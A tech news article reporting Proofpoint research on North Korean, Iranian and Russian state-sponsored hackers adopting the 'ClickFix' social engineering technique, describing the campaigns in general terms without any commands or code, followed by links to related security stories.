State-sponsored hackers from North Korea, Iran, and Russia are exploiting the ‘ClickFix’ social engineering technique for the first time – and to great success.
Popular for some time with cyber crime groups, ClickFix is a social engineering practice that uses dialog boxes with instructions to copy, paste, and run malicious commands on the target’s machine.
The technique was first seen in early March last year, employed by initial access broker TA571 and the ClearFake cluster - but it soon spread far more widely.
According to researchers at Proofpoint, over a three-month period from the end of last year through the beginning of 2025, North Korea's TA457, Iran's TA450, and Russia's UNK_RemoteRogue and TA422 have all been making use of it.
"This creative technique not only employs fake error messages as the problem, but also an authoritative alert and instructions supposedly coming from the operating system as a solution," said Proofpoint.
Rather than revolutionizing their campaigns, the technique is replacing the installation and execution stages in existing infection chains. While it's currently limited to a few state-sponsored groups, Proofpoint said it expects the attack method to become more widely tested or adopted by threat actors.
North Korea's TA427 was first spotted using ClickFix at the beginning of this year, Proofpoint noted. The group targeted individuals in a handful of think tanks, masquerading as a Japanese diplomat and offering a meeting with the Japanese ambassador to the US, Shigeo Yamada.
Iran's TA450, meanwhile, used an attacker-controlled email address - support@microsoftonlines[.]com - to send an English-language phish to targets at more than 39 organizations in the Middle East.
They deployed the ClickFix technique by persuading the target to first run PowerShell with administrator privileges, then copy and run a command contained in the email body. Doing this installed remote monitoring software, allowing the group to conduct espionage and exfiltrate data from the target’s machine.
ClickFix abuse expected to surge
UNK_RemoteRogue has only used ClickFix once, researchers said. Notably, however, none of the aforementioned groups showed repeated use of the technique.
The security firm first hypothesized that this might be because it represented a trial period, or that the groups found the technique less successful than others for machine compromise.
With TA427 returning to ClickFix with a slightly varied infection chain in April, researchers now believe that the group is developing how it uses the ClickFix technique in its operations, and that more sightings are likely in the coming months.
One noteworthy finding from the Proofpoint research is that Chinese state-sponsored groups haven’t jumped on the bandwagon as of yet. This, researchers said, could change in the coming months.
"Given the technique’s trajectory around the world, there is a conspicuous absence in the use of ClickFix by a Chinese state-sponsored actor in Proofpoint investigations," said the firm.
"However, this is likely due to visibility, and there is a high probability that a China-nexus group has also experimented with ClickFix, given its appearance across many actors’ campaigns in a short period of time."
MORE FROM ITPRO
- The Iran cyber threat: Breaking down attack tactics
- Russia is targeting unpatched vulnerabilities – what can tech leaders do to shore up defenses?
- North Korean insider attacks are skyrocketing – dozens of US firms didn't spot the hacker in their midst
-
Microsoft ramps up zero trust capabilities amid agentic AI pushNews The move from Microsoft looks to bolster agent security and prevent misuse
-
What is an AI factory and what does it mean for enterprises?Supported This form of specialized computing infrastructure powers some of our most popular services today
-
The FBI says hackers are using AI voice clones to impersonate US government officialsNews The campaign uses AI voice generation to send messages pretending to be from high-ranking figures
-
Employee phishing training is working – but don’t get complacentNews Educating staff on how to avoid phishing attacks can cut the rate by 80%
-
Russian hackers tried to lure diplomats with wine tasting – sound familiar? It’s an update to a previous campaign by the notorious Midnight Blizzard groupNews The Midnight Blizzard threat group has been targeting European diplomats with malicious emails offering an invite to wine tasting events, according to Check Point.
-
This hacker group is posing as IT helpdesk workers to target enterprises – and researchers warn its social engineering techniques are exceptionally hard to spotNews The Luna Moth hacker group is ramping up attacks on firms across a range of industries with its 'callback phishing' campaign, according to security researchers.
-
Hackers are using Zoom’s remote control feature to infect devices with malwareNews Security experts have issued an alert over a new social engineering campaign using Zoom’s remote control features to take over victim devices.
-
Have I Been Pwned owner Troy Hunt’s mailing list compromised in phishing attackTroy Hunt, the security blogger behind data-breach site Have I Been Pwned, has fallen victim to a phishing attack targeting his email subscriber list.
-
LinkedIn has become a prime hunting ground for cyber criminals – here’s what you need to knowNews Cyber criminals are flocking to LinkedIn to conduct social engineering campaigns, research shows.
-
Phishing campaign targets developers with fake CrowdStrike job offersNews Victims are drawn in with the promise of an interview for a junior developer role at CrowdStrike
